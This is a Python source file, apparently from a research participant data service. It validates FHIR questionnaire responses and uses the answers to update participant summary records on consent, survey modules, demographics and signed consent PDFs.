elif question_definition.validation is not None and question_definition.validation != '':
if question_definition.validation.startswith('date'):
if answer.valueDate is None:
logging.warning(f'No valueDate answer given for date-based question {question_code_value}')
else:
self._validate_min_max(
answer.valueDate,
question_definition.validation_min,
question_definition.validation_max,
lambda validation_str: parser.parse(validation_str).date(),
question_code_value
)
elif question_definition.validation == 'integer':
if answer.valueInteger is None:
logging.warning(
f'No valueInteger answer given for integer-based question {question_code_value}'
)
else:
self._validate_min_max(
answer.valueInteger,
question_definition.validation_min,
question_definition.validation_max,
int,
question_code_value
)
else:
logging.warning(
f'Unrecognized validation string "{question_definition.validation}" '
f'for question {question_code_value}'
)
else:
# There aren't a lot of surveys in redcap right now, so it's unclear how
# some of the other types would be answered
logging.warning(f'No validation check implemented for answer to {question_code_value} '
f'with question type {question_definition.questionType}')
def check_response(self, response: QuestionnaireResponse):
if self.survey is None:
return None
question_codes_answered = set()
for answer in response.answers:
questionnaire_question = self._questionnaire_question_map.get(answer.questionId)
if questionnaire_question is None:
# This is less validation, and more getting the object that should ideally already be linked
logging.error(f'Unable to find question {answer.questionId} in questionnaire history')
else:
survey_question = self._code_to_question_map.get(questionnaire_question.codeId)
if not survey_question:
logging.error(f'Question code used by the answer to question {answer.questionId} does not match a '
f'code found on the survey definition')
else:
self._check_answer_has_expected_data_type(answer, survey_question, questionnaire_question)
if survey_question.codeId in question_codes_answered:
logging.error(f'Too many answers given for {survey_question.code.value}')
elif survey_question.questionType != SurveyQuestionType.CHECKBOX:
if not (
survey_question.questionType == SurveyQuestionType.UNKNOWN and len(survey_question.options)
): # UNKNOWN question types could be for a Checkbox, so multiple answers should be allowed
question_codes_answered.add(survey_question.codeId)
class QuestionnaireResponseDao(BaseDao):
def __init__(self):
super(QuestionnaireResponseDao, self).__init__(QuestionnaireResponse)
def get_id(self, obj):
return obj.questionnaireResponseId
def get_with_session(self, session, obj_id, **kwargs):
result = super(QuestionnaireResponseDao, self).get_with_session(session, obj_id, **kwargs)
if result:
ParticipantDao().validate_participant_reference(session, result)
return result
def get_with_children(self, questionnaire_response_id):
with self.session() as session:
query = session.query(QuestionnaireResponse).options(subqueryload(QuestionnaireResponse.answers))
result = query.get(questionnaire_response_id)
if result:
ParticipantDao().validate_participant_reference(session, result)
return result
def _validate_model(self, session, obj): # pylint: disable=unused-argument
if not obj.questionnaireId:
raise BadRequest("QuestionnaireResponse.questionnaireId is required.")
if not obj.questionnaireVersion:
raise BadRequest("QuestionnaireResponse.questionnaireVersion is required.")
if not obj.answers:
logging.error("QuestionnaireResponse model has no answers. This is harmless but probably an error.")
def _validate_link_ids_from_resource_json_group(self, resource, link_ids):
"""
Look for question sections and validate the linkid in each answer. If there is a response
answer link id that does not exist in the questionnaire, then log a message. In
the future this may be changed to raising an exception.
This is a recursive function because answer groups can be nested.
:param resource: A group section of the response json.
:param link_ids: List of link ids to validate against.
"""
# note: resource can be either a dict or a list.
# if this is a dict and 'group' is found, always call ourselves.
if "group" in resource:
self._validate_link_ids_from_resource_json_group(resource["group"], link_ids)
if "question" not in resource and isinstance(resource, list):
for item in resource:
self._validate_link_ids_from_resource_json_group(item, link_ids)
# once we have a question section, iterate through list of answers.
if "question" in resource:
for section in resource["question"]:
link_id = section.get('linkId', None)
# Do not log warning or raise exception when link id is 'ignoreThis' for unit tests.
if (
link_id is not None
and link_id.lower() != "ignorethis"
and link_id not in link_ids
):
# The link_ids list being checked is a list of questions that have been answered,
# the list doesn't include valid link_ids that don't have answers
if "answer" in section:
logging.error(f'Questionnaire response contains invalid link ID "{link_id}"')
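# For reference, a minimal (hypothetical) response fragment handled by the walker above:
#   {"group": {"question": [
#       {"linkId": "firstName", "answer": [{"valueString": "..."}]},
#       {"linkId": "notInQuestionnaire", "answer": []}   # would be logged as an invalid link ID
#   ]}}
# Nested "group" entries and lists of groups recurse through the same method.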
@staticmethod
def _imply_street_address_2_from_street_address_1(code_ids):
code_dao = CodeDao()
street_address_1_code = code_dao.get_code(PPI_SYSTEM, STREET_ADDRESS_QUESTION_CODE)
if street_address_1_code and street_address_1_code.codeId in code_ids:
street_address_2_code = code_dao.get_code(PPI_SYSTEM, STREET_ADDRESS2_QUESTION_CODE)
if street_address_2_code and street_address_2_code.codeId not in code_ids:
code_ids.append(street_address_2_code.codeId)
def insert_with_session(self, session, questionnaire_response):
# Look for a questionnaire that matches any of the questionnaire history records.
questionnaire_history = QuestionnaireHistoryDao().get_with_children_with_session(
session, [questionnaire_response.questionnaireId, questionnaire_response.questionnaireSemanticVersion]
)
if not questionnaire_history:
raise BadRequest(
f"Questionnaire with ID {questionnaire_response.questionnaireId}, "
f"semantic version {questionnaire_response.questionnaireSemanticVersion} is not found"
)
try:
answer_validator = ResponseValidator(questionnaire_history, session)
answer_validator.check_response(questionnaire_response)
except (AttributeError, ValueError, TypeError, LookupError):
logging.error('Code error encountered when validating the response', exc_info=True)
questionnaire_response.created = clock.CLOCK.now()
if not questionnaire_response.authored:
questionnaire_response.authored = questionnaire_response.created
# Put the ID into the resource.
resource_json = json.loads(questionnaire_response.resource)
resource_json["id"] = str(questionnaire_response.questionnaireResponseId)
questionnaire_response.resource = json.dumps(resource_json)
super().validate_origin(questionnaire_response)
# Gather the question ids and records that match the questions in the response
question_ids = [answer.questionId for answer in questionnaire_response.answers]
questions = QuestionnaireQuestionDao().get_all_with_session(session, question_ids)
# DA-623: raise error when response link ids do not match our question link ids.
# Gather the valid link ids for this question
link_ids = [question.linkId for question in questions]
# look through the response and verify each link id is valid for each question.
self._validate_link_ids_from_resource_json_group(resource_json, link_ids)
code_ids = [question.codeId for question in questions]
self._imply_street_address_2_from_street_address_1(code_ids)
current_answers = QuestionnaireResponseAnswerDao().get_current_answers_for_concepts(
session, questionnaire_response.participantId, code_ids
)
# IMPORTANT: update the participant summary first to grab an exclusive lock on the participant
# row. If you instead do this after the insert of the questionnaire response, MySQL will get a
# shared lock on the participant row due the foreign key, and potentially deadlock later trying
# to get the exclusive lock if another thread is updating the participant. See DA-269.
# (We need to lock both participant and participant summary because the summary row may not
# exist yet.)
if questionnaire_response.status == QuestionnaireResponseStatus.COMPLETED:
with self.session() as new_session:
self._update_participant_summary(
new_session, questionnaire_response, code_ids, questions, questionnaire_history, resource_json
)
super(QuestionnaireResponseDao, self).insert_with_session(session, questionnaire_response)
# Mark existing answers for the questions in this response given previously by this participant
# as ended.
for answer in current_answers:
answer.endTime = questionnaire_response.created
session.merge(answer)
return questionnaire_response
def _get_field_value(self, field_type, answer):
if field_type == FieldType.CODE:
return answer.valueCodeId
if field_type == FieldType.STRING:
return answer.valueString
if field_type == FieldType.DATE:
return answer.valueDate
raise BadRequest(f"Don't know how to map field of type {field_type}")
def _update_field(self, participant_summary, field_name, field_type, answer):
value = getattr(participant_summary, field_name)
new_value = self._get_field_value(field_type, answer)
if new_value is not None and value != new_value:
setattr(participant_summary, field_name, new_value)
return True
return False
@staticmethod
def _find_cope_month(questionnaire_history: QuestionnaireHistory, response_authored_date):
cope_form_id_map = config.getSettingJson(config.COPE_FORM_ID_MAP)
for form_ids_str, month_name in cope_form_id_map.items():
if questionnaire_history.externalId in form_ids_str.split(','):
return month_name
# If the questionnaire identifier isn't in the COPE map then using response authored date as a fallback
logging.error('Unrecognized identifier for COPE survey response '
f'(questionnaire_id: "{questionnaire_history.questionnaireId}", '
f'version: "{questionnaire_history.version}", identifier: "{questionnaire_history.externalId}")')
if response_authored_date < datetime(2020, 6, 4):
return 'May'
elif response_authored_date < datetime(2020, 7, 1):
return 'June'
elif response_authored_date < datetime(2020, 10, 5):
return 'July'
elif response_authored_date < datetime(2020, 12, 5): # Nov scheduled to close on Dec 3rd
return 'Nov'
elif response_authored_date < datetime(2021, 2, 8): # Feb scheduled to open on Feb 9th
return 'Dec'
else:
return 'Feb'
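# The COPE_FORM_ID_MAP setting is expected to look roughly like this (the form ids below
# are hypothetical; the real mapping lives in the server configuration):
#   {"10395,10396": "May", "10457": "June"}
# i.e. comma-separated external form ids keyed to the month suffix used for the
# questionnaireOnCope<Month> fields on the participant summary.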
def _update_participant_summary(
self, session, questionnaire_response, code_ids, questions, questionnaire_history, resource_json
):
"""Updates the participant summary based on questions answered and modules completed
in the questionnaire response.
If no participant summary exists already, only a response to the study enrollment consent
questionnaire can be submitted, and it must include first and last name and e-mail address.
"""
# Block on other threads modifying the participant or participant summary.
participant = ParticipantDao().get_for_update(session, questionnaire_response.participantId)
if participant is None:
raise BadRequest(f"Participant with ID {questionnaire_response.participantId} is not found.")
participant_summary = participant.participantSummary
authored = questionnaire_response.authored
# If authored is a datetime and has tzinfo, convert to utc and remove tzinfo.
# The authored timestamps in the participant summary will already be in utc, but lack tzinfo.
if authored and isinstance(authored, datetime) and authored.tzinfo:
authored = authored.astimezone(pytz.utc).replace(tzinfo=None)
code_ids.extend([concept.codeId for concept in questionnaire_history.concepts])
code_dao = CodeDao()
something_changed = False
module_changed = False
# If no participant summary exists, make sure this is the study enrollment consent.
if not participant_summary:
consent_code = code_dao.get_code(PPI_SYSTEM, CONSENT_FOR_STUDY_ENROLLMENT_MODULE)
if not consent_code:
raise BadRequest("No study enrollment consent code found; import codebook.")
if consent_code.codeId not in code_ids:
raise BadRequest(
f"Can't submit order for participant {questionnaire_response.participantId} without consent"
)
if not _validate_consent_pdfs(resource_json):
raise BadRequest(
f"Unable to find signed consent-for-enrollment file for participant"
)
participant_summary = ParticipantDao.create_summary_for_participant(participant)
something_changed = True
# Fetch the codes for all questions and concepts
codes = code_dao.get_with_ids(code_ids)
code_map = {code.codeId: code for code in codes if code.system == PPI_SYSTEM}
question_map = {question.questionnaireQuestionId: question for question in questions}
race_code_ids = []
gender_code_ids = []
ehr_consent = False
gror_consent = None
dvehr_consent = QuestionnaireStatus.SUBMITTED_NO_CONSENT
street_address_submitted = False
street_address2_submitted = False
# Set summary fields for answers that have questions with codes found in QUESTION_CODE_TO_FIELD
for answer in questionnaire_response.answers:
question = question_map.get(answer.questionId)
if question:
code = code_map.get(question.codeId)
if code:
if code.value == GENDER_IDENTITY_QUESTION_CODE:
gender_code_ids.append(answer.valueCodeId)
elif code.value == STREET_ADDRESS_QUESTION_CODE:
street_address_submitted = answer.valueString is not None
elif code.value == STREET_ADDRESS2_QUESTION_CODE:
street_address2_submitted = answer.valueString is not None
summary_field = QUESTION_CODE_TO_FIELD.get(code.value)
if summary_field:
if something_changed:
self._update_field(participant_summary, summary_field[0], summary_field[1], answer)
else:
something_changed = self._update_field(
participant_summary, summary_field[0], summary_field[1], answer
)
elif code.value == RACE_QUESTION_CODE:
race_code_ids.append(answer.valueCodeId)
elif code.value == DVEHR_SHARING_QUESTION_CODE:
code = code_dao.get(answer.valueCodeId)
if code and code.value == DVEHRSHARING_CONSENT_CODE_YES:
dvehr_consent = QuestionnaireStatus.SUBMITTED
elif code and code.value == DVEHRSHARING_CONSENT_CODE_NOT_SURE:
dvehr_consent = QuestionnaireStatus.SUBMITTED_NOT_SURE
elif code.value == EHR_CONSENT_QUESTION_CODE:
code = code_dao.get(answer.valueCodeId)
if participant_summary.ehrConsentExpireStatus == ConsentExpireStatus.EXPIRED and \
authored > participant_summary.ehrConsentExpireAuthored:
participant_summary.ehrConsentExpireStatus = ConsentExpireStatus.UNSET
participant_summary.ehrConsentExpireAuthored = None
participant_summary.ehrConsentExpireTime = None
if code and code.value == CONSENT_PERMISSION_YES_CODE:
ehr_consent = True
if participant_summary.consentForElectronicHealthRecordsFirstYesAuthored is None:
participant_summary.consentForElectronicHealthRecordsFirstYesAuthored = authored
if participant_summary.ehrConsentExpireStatus == ConsentExpireStatus.EXPIRED and \
authored < participant_summary.ehrConsentExpireAuthored:
ehr_consent = False
elif code.value == EHR_CONSENT_EXPIRED_QUESTION_CODE:
if answer.valueString and answer.valueString == EHR_CONSENT_EXPIRED_YES:
participant_summary.ehrConsentExpireStatus = ConsentExpireStatus.EXPIRED
participant_summary.ehrConsentExpireAuthored = authored
participant_summary.ehrConsentExpireTime = questionnaire_response.created
something_changed = True
elif code.value == CABOR_SIGNATURE_QUESTION_CODE:
if answer.valueUri or answer.valueString:
# TODO: validate the URI? [DA-326]
if not participant_summary.consentForCABoR:
participant_summary.consentForCABoR = True
participant_summary.consentForCABoRTime = questionnaire_response.created
participant_summary.consentForCABoRAuthored = authored
something_changed = True
elif code.value == GROR_CONSENT_QUESTION_CODE:
if code_dao.get(answer.valueCodeId).value == CONSENT_GROR_YES_CODE:
gror_consent = QuestionnaireStatus.SUBMITTED
elif code_dao.get(answer.valueCodeId).value == CONSENT_GROR_NO_CODE:
gror_consent = QuestionnaireStatus.SUBMITTED_NO_CONSENT
elif code_dao.get(answer.valueCodeId).value == CONSENT_GROR_NOT_SURE:
gror_consent = QuestionnaireStatus.SUBMITTED_NOT_SURE
elif code.value == COPE_CONSENT_QUESTION_CODE:
answer_value = code_dao.get(answer.valueCodeId).value
if answer_value == CONSENT_COPE_YES_CODE:
submission_status = QuestionnaireStatus.SUBMITTED
elif answer_value in [CONSENT_COPE_NO_CODE, CONSENT_COPE_DEFERRED_CODE]:
submission_status = QuestionnaireStatus.SUBMITTED_NO_CONSENT
else:
submission_status = QuestionnaireStatus.SUBMITTED_INVALID
month_name = self._find_cope_month(questionnaire_history, authored)
setattr(participant_summary, f'questionnaireOnCope{month_name}', submission_status)
setattr(participant_summary, f'questionnaireOnCope{month_name}Time',
questionnaire_response.created)
setattr(participant_summary, f'questionnaireOnCope{month_name}Authored', authored)
# COPE Survey changes need to update number of modules complete in summary
module_changed = True
elif code.value == PRIMARY_CONSENT_UPDATE_QUESTION_CODE:
answer_value = code_dao.get(answer.valueCodeId).value
if answer_value == COHORT_1_REVIEW_CONSENT_YES_CODE:
participant_summary.consentForStudyEnrollmentAuthored = authored
elif code.value == CONSENT_COHORT_GROUP_CODE:
try:
cohort_group = int(answer.valueString)
# Only checking that we know of the cohort group so we don't crash when
# storing in the Enum column
cohort_numbers = ParticipantCohort.numbers()
if cohort_group not in cohort_numbers:
raise ValueError
else:
participant_summary.consentCohort = answer.valueString
something_changed = True
except ValueError:
logging.error(f'Invalid value given for cohort group: received "{answer.valueString}"')
# If the answer for line 2 of the street address was left out then it needs to be clear on summary.
# So when it hasn't been submitted and there is something set for streetAddress2 we want to clear it out.
summary_has_street_line_two = participant_summary.streetAddress2 is not None \
and participant_summary.streetAddress2 != ""
if street_address_submitted and not street_address2_submitted and summary_has_street_line_two:
something_changed = True
participant_summary.streetAddress2 = None
# If race was provided in the response in one or more answers, set the new value.
if race_code_ids:
race_codes = [code_dao.get(code_id) for code_id in race_code_ids]
race = get_race(race_codes)
if race != participant_summary.race:
participant_summary.race = race
something_changed = True
if gender_code_ids:
gender_codes = [code_dao.get(code_id) for code_id in gender_code_ids]
gender = get_gender_identity(gender_codes)
if gender != participant_summary.genderIdentity:
participant_summary.genderIdentity = gender
something_changed = True
dna_program_consent_update_code = config.getSettingJson(config.DNA_PROGRAM_CONSENT_UPDATE_CODE, None)
# Set summary fields to SUBMITTED for questionnaire concepts that are found in
# QUESTIONNAIRE_MODULE_CODE_TO_FIELD
for concept in questionnaire_history.concepts:
code = code_map.get(concept.codeId)
if code:
summary_field = QUESTIONNAIRE_MODULE_CODE_TO_FIELD.get(code.value)
if summary_field:
new_status = QuestionnaireStatus.SUBMITTED
if code.value == CONSENT_FOR_ELECTRONIC_HEALTH_RECORDS_MODULE and not ehr_consent:
new_status = QuestionnaireStatus.SUBMITTED_NO_CONSENT
elif code.value == CONSENT_FOR_DVEHR_MODULE:
new_status = dvehr_consent
elif code.value == CONSENT_FOR_GENOMICS_ROR_MODULE:
if gror_consent is None:
raise BadRequest(
"GROR Consent answer is required to match code {}."
.format([CONSENT_GROR_YES_CODE, CONSENT_GROR_NO_CODE, CONSENT_GROR_NOT_SURE])
)
new_status = gror_consent
elif code.value == CONSENT_FOR_STUDY_ENROLLMENT_MODULE:
participant_summary.semanticVersionForPrimaryConsent = \
questionnaire_response.questionnaireSemanticVersion
if participant_summary.consentCohort is None or \
participant_summary.consentCohort == ParticipantCohort.UNSET:
if participant_summary.participantOrigin == 'vibrent':
logging.warning(f'Missing expected consent cohort information for participant '
f'{participant_summary.participantId}')
if authored >= PARTICIPANT_COHORT_3_START_TIME:
participant_summary.consentCohort = ParticipantCohort.COHORT_3
elif PARTICIPANT_COHORT_2_START_TIME <= authored < PARTICIPANT_COHORT_3_START_TIME:
participant_summary.consentCohort = ParticipantCohort.COHORT_2
elif authored < PARTICIPANT_COHORT_2_START_TIME:
participant_summary.consentCohort = ParticipantCohort.COHORT_1
if participant_summary.consentForStudyEnrollmentFirstYesAuthored is None:
participant_summary.consentForStudyEnrollmentFirstYesAuthored = authored
# set language of consent to participant summary
for extension in resource_json.get("extension", []):
if (
extension.get("url") == _LANGUAGE_EXTENSION
and extension.get("valueCode") in LANGUAGE_OF_CONSENT
):
if participant_summary.primaryLanguage != extension.get("valueCode"):
participant_summary.primaryLanguage = extension.get("valueCode")
something_changed = True
break
elif (
extension.get("url") == _LANGUAGE_EXTENSION
and extension.get("valueCode") not in LANGUAGE_OF_CONSENT
):
logging.warning(f"consent language {extension.get('valueCode')} not recognized.")
if getattr(participant_summary, summary_field) != new_status:
setattr(participant_summary, summary_field, new_status)
setattr(participant_summary, summary_field + "Time", questionnaire_response.created)
setattr(participant_summary, summary_field + "Authored", authored)
something_changed = True
module_changed = True
elif dna_program_consent_update_code is not None and code.value == dna_program_consent_update_code:
# If we receive a questionnaire response it means they've viewed the update and we should mark
# them as submitted
participant_summary.questionnaireOnDnaProgram = QuestionnaireStatus.SUBMITTED
participant_summary.questionnaireOnDnaProgramAuthored = authored
elif code.value == COPE_VACCINE_MINUTE_1_MODULE_CODE \
and participant_summary.questionnaireOnCopeVaccineMinute1 != QuestionnaireStatus.SUBMITTED:
participant_summary.questionnaireOnCopeVaccineMinute1 = QuestionnaireStatus.SUBMITTED
participant_summary.questionnaireOnCopeVaccineMinute1Authored = authored
module_changed = True
if module_changed:
participant_summary.numCompletedBaselinePPIModules = count_completed_baseline_ppi_modules(
participant_summary
)
participant_summary.baselineQuestionnairesFirstCompleteAuthored = get_first_completed_baseline_time(
participant_summary
)
participant_summary.numCompletedPPIModules = count_completed_ppi_modules(participant_summary)
if something_changed:
first_last = (participant_summary.firstName, participant_summary.lastName)
email_phone = (participant_summary.email, participant_summary.loginPhoneNumber)
if not all(first_last):
raise BadRequest(
"First name ({:s}), and last name ({:s}) required for consenting."
.format(*["present" if part else "missing" for part in first_last])
)
if not any(email_phone):
raise BadRequest(
"Email address ({:s}), or phone number ({:s}) required for consenting."
.format(*["present" if part else "missing" for part in email_phone])
)
ParticipantSummaryDao().update_enrollment_status(participant_summary)
participant_summary.lastModified = clock.CLOCK.now()
session.merge(participant_summary)
# switch account to test account if the phone number starts with 4442
# this is a requirement from PTSC
ph = getattr(participant_summary, 'loginPhoneNumber') or \
getattr(participant_summary, 'phoneNumber') or 'None'
ph_clean = re.sub(r'[()|\-\s]', '', ph)
if ph_clean.startswith(TEST_LOGIN_PHONE_NUMBER_PREFIX):
ParticipantDao().switch_to_test_account(session, participant)
# update participant gender/race answers table
if race_code_ids:
participant_race_answer_dao = ParticipantRaceAnswersDao()
participant_race_answer_dao.update_race_answers_with_session(
session, participant.participantId, race_code_ids
)
if gender_code_ids:
participant_gender_race_dao = ParticipantGenderAnswersDao()
participant_gender_race_dao.update_gender_answers_with_session(
session, participant.participantId, gender_code_ids
)
def insert(self, obj):
if obj.questionnaireResponseId:
return super(QuestionnaireResponseDao, self).insert(obj)
return self._insert_with_random_id(obj, ["questionnaireResponseId"])
def read_status(self, fhir_response: fhir_questionnaireresponse.QuestionnaireResponse):
status_map = {
'in-progress': QuestionnaireResponseStatus.IN_PROGRESS,
'completed': QuestionnaireResponseStatus.COMPLETED,
'amended': QuestionnaireResponseStatus.AMENDED,
'entered-in-error': QuestionnaireResponseStatus.ENTERED_IN_ERROR,
'stopped': QuestionnaireResponseStatus.STOPPED
}
if fhir_response.status not in status_map:
raise BadRequest(f'Unrecognized status "{fhir_response.status}"')
else:
return status_map[fhir_response.status]
@classmethod
def calculate_answer_hash(cls, response_json):
answer_list_json = response_json.get('group', '')
answer_list_str = json.dumps(answer_list_json)
return md5(answer_list_str.encode('utf-8')).hexdigest()
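# Note that the hash only covers the serialized "group" element (the answers), so two
# payloads that differ solely in metadata such as "authored" share the same answerHash.
# Illustrative (hypothetical) call:
#   QuestionnaireResponseDao.calculate_answer_hash({'group': {'question': []}})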
@classmethod
def _extension_from_fhir_object(cls, fhir_extension):
# Get the non-empty values from the FHIR extension object for the url field and
# any field with a name that starts with "value"
fhir_fields = fhir_extension.__dict__
filtered_values = {}
for name, value in fhir_fields.items():
if value is not None and (name == 'url' or name.startswith('value')):
filtered_values[name] = value
return QuestionnaireResponseExtension(**filtered_values)
@classmethod
def _parse_external_identifier(cls, fhir_qr):
external_id = None
if fhir_qr.identifier:
external_id = fhir_qr.identifier.value
if external_id and len(external_id) > QuestionnaireResponse.externalId.type.length:
logging.warning('External id was larger than expected, unable to save it to the database.')
external_id = None
return external_id
@classmethod
def extension_models_from_fhir_objects(cls, fhir_extensions):
if fhir_extensions:
try:
return [cls._extension_from_fhir_object(extension) for extension in fhir_extensions]
except TypeError:
logging.warning('Unexpected extension value', exc_info=True)
return []
else:
return []
def from_client_json(self, resource_json, participant_id=None, client_id=None):
# pylint: disable=unused-argument
# Parse the questionnaire response, but preserve the original response when persisting
fhir_qr = fhir_questionnaireresponse.QuestionnaireResponse(resource_json)
patient_id = fhir_qr.subject.reference
if patient_id != "Patient/P{}".format(participant_id):
msg = "Questionnaire response subject reference does not match participant_id {}"
raise BadRequest(msg.format(participant_id))
questionnaire = self._get_questionnaire(fhir_qr.questionnaire, resource_json)
if questionnaire.status == QuestionnaireDefinitionStatus.INVALID:
raise BadRequest(
f"Submitted questionnaire that is marked as invalid: questionnaire ID {questionnaire.questionnaireId}"
)
authored = None
if fhir_qr.authored and fhir_qr.authored.date:
authored = fhir_qr.authored.date
language = None
non_participant_author = None
if fhir_qr.extension:
for ext in fhir_qr.extension:
if "iso21090-ST-language" in ext.url:
language = ext.valueCode[:2]
if ext.url == _CATI_EXTENSION:
non_participant_author = ext.valueString
qr = QuestionnaireResponse(
questionnaireId=questionnaire.questionnaireId,
questionnaireVersion=questionnaire.version,
questionnaireSemanticVersion=questionnaire.semanticVersion,
participantId=participant_id,
nonParticipantAuthor=non_participant_author,
authored=authored,
language=language,
resource=json.dumps(resource_json),
status=self.read_status(fhir_qr),
answerHash=self.calculate_answer_hash(resource_json),
externalId=self._parse_external_identifier(fhir_qr)
)
if fhir_qr.group is not None:
# Extract a code map and answers from the questionnaire response.
code_map, answers = self._extract_codes_and_answers(fhir_qr.group, questionnaire)
if not answers:
logging.error("No answers from QuestionnaireResponse JSON. This is harmless but probably an error.")
# Get or insert codes, and retrieve their database IDs.
code_id_map = CodeDao().get_internal_id_code_map(code_map)
# Now add the child answers, using the IDs in code_id_map
self._add_answers(qr, code_id_map, answers)
qr.extensions = self.extension_models_from_fhir_objects(fhir_qr.extension)
return qr
@staticmethod
def _get_questionnaire(questionnaire, resource_json):
"""Retrieves the questionnaire referenced by this response; mutates the resource JSON to include
the version if it doesn't already.
If a questionnaire has a history element it goes into the if block here."""
# if history...
if not questionnaire.reference.startswith(_QUESTIONNAIRE_PREFIX):
raise BadRequest(f"Questionnaire reference {questionnaire.reference} is invalid")
questionnaire_reference = questionnaire.reference[len(_QUESTIONNAIRE_PREFIX):]
# If the questionnaire response specifies the version of the questionnaire it's for, use it.
if _QUESTIONNAIRE_HISTORY_SEGMENT in questionnaire_reference:
questionnaire_ref_parts = questionnaire_reference.split(_QUESTIONNAIRE_HISTORY_SEGMENT)
if len(questionnaire_ref_parts) != 2:
raise BadRequest(f"Questionnaire id {questionnaire_reference} is invalid")
try:
questionnaire_id = int(questionnaire_ref_parts[0])
semantic_version = questionnaire_ref_parts[1]
q = QuestionnaireHistoryDao().get_with_children((questionnaire_id, semantic_version))
if not q:
raise BadRequest(f"Questionnaire with id {questionnaire_id}, semantic version {semantic_version} "
f"is not found")
return q
except ValueError:
raise BadRequest(f"Questionnaire id {questionnaire_reference} is invalid")
else:
# if no questionnaire/history...
try:
questionnaire_id = int(questionnaire_reference)
from rdr_service.dao.questionnaire_dao import QuestionnaireDao
q = QuestionnaireDao().get_with_children(questionnaire_id)
if not q:
raise BadRequest(f"Questionnaire with id {questionnaire_id} is not found")
# Mutate the questionnaire reference to include the version.
questionnaire_reference = _QUESTIONNAIRE_REFERENCE_FORMAT.format(questionnaire_id, q.semanticVersion)
resource_json["questionnaire"]["reference"] = questionnaire_reference
return q
except ValueError:
raise BadRequest(f"Questionnaire id {questionnaire_reference} is invalid")
@classmethod
def _extract_codes_and_answers(cls, group, q):
"""Returns (system, code) -> (display, code type, question code id) code map
and (QuestionnaireResponseAnswer, (system, code)) answer pairs.
"""
code_map = {}
answers = []
link_id_to_question = {}
if q.questions:
link_id_to_question = {question.linkId: question for question in q.questions}
cls._populate_codes_and_answers(group, code_map, answers, link_id_to_question, q.questionnaireId)
return (code_map, answers)
@classmethod
def _populate_codes_and_answers(cls, group, code_map, answers, link_id_to_question, questionnaire_id):
"""Populates code_map with (system, code) -> (display, code type, question code id)
and answers with (QuestionnaireResponseAnswer, (system, code)) pairs."""
if group.question:
for question in group.question:
if question.linkId and question.answer:
qq = link_id_to_question.get(question.linkId)
if qq:
for answer in question.answer:
qr_answer = QuestionnaireResponseAnswer(questionId=qq.questionnaireQuestionId)
system_and_code = None
ignore_answer = False
if answer.valueCoding:
if not answer.valueCoding.system:
raise BadRequest(f"No system provided for valueCoding: {question.linkId}")
if not answer.valueCoding.code:
raise BadRequest(f"No code provided for valueCoding: {question.linkId}")
if answer.valueCoding.system == PPI_EXTRA_SYSTEM:
# Ignore answers from the ppi-extra system, as they aren't used for analysis.
ignore_answer = True
else:
system_and_code = (answer.valueCoding.system, answer.valueCoding.code)
if system_and_code not in code_map:
code_map[system_and_code] = (
answer.valueCoding.display,
CodeType.ANSWER,
qq.codeId,
)
if not ignore_answer:
if answer.valueDecimal is not None:
qr_answer.valueDecimal = answer.valueDecimal
if answer.valueInteger is not None:
qr_answer.valueInteger = answer.valueInteger
if answer.valueString is not None:
answer_length = len(answer.valueString)
max_length = QuestionnaireResponseAnswer.VALUE_STRING_MAXLEN
if answer_length > max_length:
raise BadRequest(
f"String value too long (len={answer_length}); "
f"must be less than {max_length}"
)
qr_answer.valueString = answer.valueString
if answer.valueDate is not None:
qr_answer.valueDate = answer.valueDate.date
if answer.valueDateTime is not None:
qr_answer.valueDateTime = answer.valueDateTime.date
if answer.valueBoolean is not None:
qr_answer.valueBoolean = answer.valueBoolean
if answer.valueUri is not None:
qr_answer.valueUri = answer.valueUri
answers.append((qr_answer, system_and_code))
if answer.group:
for sub_group in answer.group:
cls._populate_codes_and_answers(
sub_group, code_map, answers, link_id_to_question, questionnaire_id
)
if group.group:
for sub_group in group.group:
cls._populate_codes_and_answers(sub_group, code_map, answers, link_id_to_question, questionnaire_id)
@staticmethod
def _add_answers(qr, code_id_map, answers):
for answer, system_and_code in answers:
if system_and_code:
system, code = system_and_code
answer.valueCodeId = code_id_map.get(system, code)
qr.answers.append(answer)
def _validate_consent_pdfs(resource):
"""Checks for any consent-form-signed-pdf extensions and validates their PDFs in GCS."""
if resource.get("resourceType") != "QuestionnaireResponse":
raise ValueError(f'Expected QuestionnaireResponse for "resourceType" in {resource}.')
# We now look up consent bucket names by participant origin id.
p_origin = get_account_origin_id()
consent_bucket_config = config.getSettingJson(config.CONSENT_PDF_BUCKET)
# If we don't match the origin id, just return the first bucket in the dict.
try:
consent_bucket = consent_bucket_config.get(p_origin, consent_bucket_config[next(iter(consent_bucket_config))])
except AttributeError:
pass
found_pdf = False
for extension in resource.get("extension", []):
if extension["url"] != _SIGNED_CONSENT_EXTENSION:
continue
local_pdf_path = extension["valueString"]
_, ext = os.path.splitext(local_pdf_path)
if ext.lower() != ".pdf":
raise BadRequest(f"Signed PDF must end in .pdf, found {ext} (from {local_pdf_path}).")
# Treat the value as a bucket-relative path, allowing a leading slash or not.
if not local_pdf_path.startswith("/"):
local_pdf_path = "/" + local_pdf_path
_raise_if_gcloud_file_missing("/{}{}".format(consent_bucket, local_pdf_path))
found_pdf = True
if config.GAE_PROJECT == 'localhost' or is_self_request():
# Pretend we found a valid consent if we're running on a development machine
# skip checking for self request from fake participant generating
return True
else:
return found_pdf
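# A signed-consent extension on the response is expected to look roughly like this
# (the path shown is illustrative, not taken from a real payload):
#   {"url": _SIGNED_CONSENT_EXTENSION,
#    "valueString": "/Participant/P123456/ConsentPII__123.pdf"}
# The valueString is treated as a path relative to the origin-specific consent bucket.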
def _raise_if_gcloud_file_missing(path):
"""Checks that a GCS file exists.
Args:
path: An absolute Google Cloud Storage path, starting with /$BUCKET/.
Raises:
BadRequest if the path does not reference a file.
"""
storage_provider = storage.get_storage_provider()
if not storage_provider.exists(path):
raise BadRequest(f"Google Cloud Storage file not found in {path}.")
class QuestionnaireResponseAnswerDao(BaseDao):
def __init__(self):
super(QuestionnaireResponseAnswerDao, self).__init__(QuestionnaireResponseAnswer)
def get_id(self, obj):
return obj.questionnaireResponseAnswerId
def get_current_answers_for_concepts(self, session, participant_id, code_ids):
"""Return any answers the participant has previously given to questions with the specified
code IDs."""
if not code_ids:
return []
return (
session.query(QuestionnaireResponseAnswer)
.join(QuestionnaireResponse)
.join(QuestionnaireQuestion)
.filter(QuestionnaireResponse.participantId == participant_id)
.filter(QuestionnaireResponseAnswer.endTime == None)
.filter(QuestionnaireQuestion.codeId.in_(code_ids))
.all()
)
|
bsd-3-clause
| 193,286,261,942,352,830
